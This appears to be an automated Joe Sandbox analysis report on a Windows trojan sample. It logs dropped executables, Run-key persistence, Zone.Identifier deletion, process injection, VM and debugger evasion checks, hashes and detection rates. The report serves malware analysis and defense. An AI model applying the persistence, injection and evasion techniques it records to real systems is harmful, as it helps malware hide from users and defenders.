Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 6_2_0040B3E1	6_2_0040B3E1
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 6_2_0040C3AD	6_2_0040C3AD
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 17_2_004031FA	17_2_004031FA
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 17_2_00409C02	17_2_00409C02
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 17_2_0040A174	17_2_0040A174
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 17_2_00409690	17_2_00409690
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 17_2_0040777E	17_2_0040777E
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 17_2_0040B3E1	17_2_0040B3E1
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 17_2_0040C3AD	17_2_0040C3AD

Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: String function: 00402520 appears 54 times
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: String function: 00404520 appears 38 times

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\jqenyeo.exe 525DD105980B23F780D5E9A747FF3D1BC09DD41FBFDD4266B64F1BDD6D632CFF
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe 525DD105980B23F780D5E9A747FF3D1BC09DD41FBFDD4266B64F1BDD6D632CFF

Source: xeWd55M5Lb.exe	Virustotal: Detection: 49%
Source: xeWd55M5Lb.exe	ReversingLabs: Detection: 48%

Source: C:\Users\user\Desktop\xeWd55M5Lb.exe

File read: C:\Users\user\Desktop\xeWd55M5Lb.exe

Jump to behavior

Source: xeWd55M5Lb.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\xeWd55M5Lb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\xeWd55M5Lb.exe "C:\Users\user\Desktop\xeWd55M5Lb.exe"
Source: C:\Users\user\Desktop\xeWd55M5Lb.exe	Process created: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process created: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
Source: unknown	Process created: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe "C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe"
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6696 -s 628
Source: unknown	Process created: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe "C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe"
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 608
Source: C:\Users\user\Desktop\xeWd55M5Lb.exe	Process created: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process created: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk	Jump to behavior

Source: C:\Users\user\Desktop\xeWd55M5Lb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\xeWd55M5Lb.exe

0_2_00403640

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

File created: C:\Users\user\AppData\Roaming\mtmgxghqo

Jump to behavior

Source: C:\Users\user\Desktop\xeWd55M5Lb.exe

File created: C:\Users\user\AppData\Local\Temp\nsg494E.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@12/18@16/2

Source: C:\Users\user\Desktop\xeWd55M5Lb.exe

Code function: 0_2_004021AA CoCreateInstance,

0_2_004021AA

Source: C:\Users\user\Desktop\xeWd55M5Lb.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\xeWd55M5Lb.exe

Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404AB5

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5420:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5948
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6696
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{b07368c6-c9e6-43bc-939d-00b8dbf662e7}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_01

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: xeWd55M5Lb.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: jqenyeo.exe, 00000001.00000003.285113865.00000000025B0000.00000004.00001000.00020000.00000000.sdmp, jqenyeo.exe, 00000001.00000003.281647167.0000000002740000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: jqenyeo.exe, 00000001.00000003.285113865.00000000025B0000.00000004.00001000.00020000.00000000.sdmp, jqenyeo.exe, 00000001.00000003.281647167.0000000002740000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Code function: 1_2_00402565 push ecx; ret	1_2_00402578
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 6_2_00402565 push ecx; ret	6_2_00402578
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 17_2_00402565 push ecx; ret	17_2_00402578

Source: C:\Users\user\Desktop\xeWd55M5Lb.exe	File created: C:\Users\user\AppData\Local\Temp\jqenyeo.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	File created: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run wboyuqknqhxiar			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run wboyuqknqhxiar			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

File opened: C:\Users\user\AppData\Local\Temp\jqenyeo.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

Code function: 1_2_004031FA RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_004031FA

Source: C:\Users\user\Desktop\xeWd55M5Lb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_1-6642

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe TID: 6616	Thread sleep time: -1844674407370954s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe TID: 6608	Thread sleep time: -800000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_6-6439
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_1-7082

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Window / User API: foregroundWindowGot 819			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Window / User API: foregroundWindowGot 723			Jump to behavior

Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	API coverage: 6.8 %
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	API coverage: 7.3 %

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\xeWd55M5Lb.exe	Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405D74
Source: C:\Users\user\Desktop\xeWd55M5Lb.exe	Code function: 0_2_0040699E FindFirstFileW,FindClose,	0_2_0040699E
Source: C:\Users\user\Desktop\xeWd55M5Lb.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\xeWd55M5Lb.exe	API call chain: ExitProcess graph end node	graph_0-3479
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	API call chain: ExitProcess graph end node	graph_1-7084
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	API call chain: ExitProcess graph end node	graph_6-6441
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	API call chain: ExitProcess graph end node

Source: xeWd55M5Lb.exe, 00000000.00000002.293043003.00000000007A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: jqenyeo.exe, 00000003.00000003.480383751.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.488734176.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.517122549.00000000006D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

Code function: 1_2_004071A5 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_004071A5

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

1_2_004071A5

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

Code function: 1_2_0040819A __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

1_2_0040819A

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Code function: 1_2_009F03F8 mov eax, dword ptr fs:[00000030h]	1_2_009F03F8
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Code function: 1_2_009F06F7 mov eax, dword ptr fs:[00000030h]	1_2_009F06F7
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Code function: 1_2_009F061D mov eax, dword ptr fs:[00000030h]	1_2_009F061D
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Code function: 1_2_009F0736 mov eax, dword ptr fs:[00000030h]	1_2_009F0736
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Code function: 1_2_009F0772 mov eax, dword ptr fs:[00000030h]	1_2_009F0772

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Code function: 1_2_004040DE SetUnhandledExceptionFilter,	1_2_004040DE
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Code function: 1_2_0040410F SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0040410F
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 6_2_004040DE SetUnhandledExceptionFilter,	6_2_004040DE
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 6_2_0040410F SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_0040410F
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 17_2_004040DE SetUnhandledExceptionFilter,	17_2_004040DE
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 17_2_0040410F SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_0040410F

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

Memory written: C:\Users\user\AppData\Local\Temp\jqenyeo.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

Process created: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk

Jump to behavior

Source: jqenyeo.exe, 00000003.00000003.480383751.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.488734176.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.517122549.00000000006D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: jqenyeo.exe, 00000003.00000003.480383751.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.488734176.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.517122549.00000000006D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mProgram Manager
Source: jqenyeo.exe, 00000003.00000003.517122549.00000000006D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mProgram ManagerrogramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=DESKTOP-716T77
Source: jqenyeo.exe, 00000003.00000003.517122549.00000000006D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: oProgram Manager
Source: jqenyeo.exe, 00000003.00000003.517122549.00000000006D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager`O
Source: jqenyeo.exe, 00000003.00000003.488734176.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.517122549.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.484552828.0000000000701000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerProgram Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPD
Source: jqenyeo.exe, 00000003.00000003.445008058.0000000000700000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.451453735.0000000000700000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.488734176.00000000006D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerrogramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=DESKTOP-716T77

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

Code function: 1_2_00404D5C cpuid

1_2_00404D5C

